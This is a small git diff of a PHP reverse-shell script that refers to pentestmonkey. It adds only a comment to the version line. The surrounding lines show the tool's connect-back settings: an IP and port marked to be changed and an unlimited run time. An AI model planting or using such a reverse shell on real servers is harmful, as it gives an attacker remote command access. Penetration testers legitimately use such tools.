diff --git a/php-reverse-shell.php b/php-reverse-shell.php index 2503b71..ed77f2e 100755 --- a/php-reverse-shell.php +++ b/php-reverse-shell.php @@ -45,7 +45,7 @@ // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck. set_time_limit (0); -$VERSION = "1.0"; +$VERSION = "1.0"; //Specifies the version $ip = '127.0.0.1'; // CHANGE THIS $port = 1234; // CHANGE THIS $chunk_size = 1400;